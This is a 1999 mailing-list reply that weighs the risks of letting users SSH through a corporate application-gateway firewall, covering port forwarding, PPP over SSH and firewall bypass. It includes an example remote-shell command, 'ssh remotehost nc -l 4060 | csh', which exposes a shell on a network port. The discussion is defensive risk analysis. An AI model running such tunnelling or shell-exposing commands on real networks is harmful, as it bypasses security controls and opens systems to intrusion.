Firewall Wizards mailing list archives
Re: SSH through firewall
From: James Neal - HandiCAT <neal () ee pdx edu>
Date: Mon, 05 Jul 1999 21:24:48 -0700
In message <782FA6543FA5D111933D0000F86AEFA8019AA0C1 () simail5 si bosch de>you wr ite:
I'm thinking about allowing users in the trusted network to do ssh through a non-transparent application gateway firewall into an untrusted network. Do you think this is "secure"? I'm not sure because users can tunnel all kinds of protocols in ssh. What would be possible attacks?
Given the alternatives (ftp and telnet), I'd say SSH is a wonderful choice. That being said, some of "The bad" of SSH. o Straight ssh-- directly from the source at ftp.cs.hut.fi-- allows users to forward ports from the outside machine across their secure channel to arbitrary ports on hosts inside your firewall. o It's quite possible to run PPP over SSH. In fact, there's a HOWTO about doing just that in the Linux world. It's basically just a # ssh remotehost pppd | pppd o Related to the first two items. There's nothing keeping a user from doing an "ssh remotehost nc -l 4060 | csh", to allow people to run shell commands by just connecting to port 4060 of the remote machine. Of course, tools exist that allow one to bypass a firewall using HTTP, telnet, and the r* services as well, so if you /do/ allow SSH through, at least thier hax0r packets will be going over an encrypted tunnel and not being sniffed or hujacked. :)
Do you think this is feasible with a non-transparent firewall? Do you know a firewall that is capable of this?
Urg.. Beats me. I don't even know how SSH would function over a non-transparent firewall. -James -- James Neal <jfneal () intermedia com> Senior Systems Administrator - Intermedia Communications I don't speak for Intermedia, yadadada.
Current thread:
- SSH through firewall Ginsberg Rainer (QI/INF4) * (Jul 05)
- Re: SSH through firewall James Neal - HandiCAT (Jul 06)
- Re: SSH through firewall Kevin T. Shivers (Jul 06)
- Re: SSH through firewall Aaron D. Turner (Jul 08)
- Re: SSH through firewall Kevin Steves (Jul 12)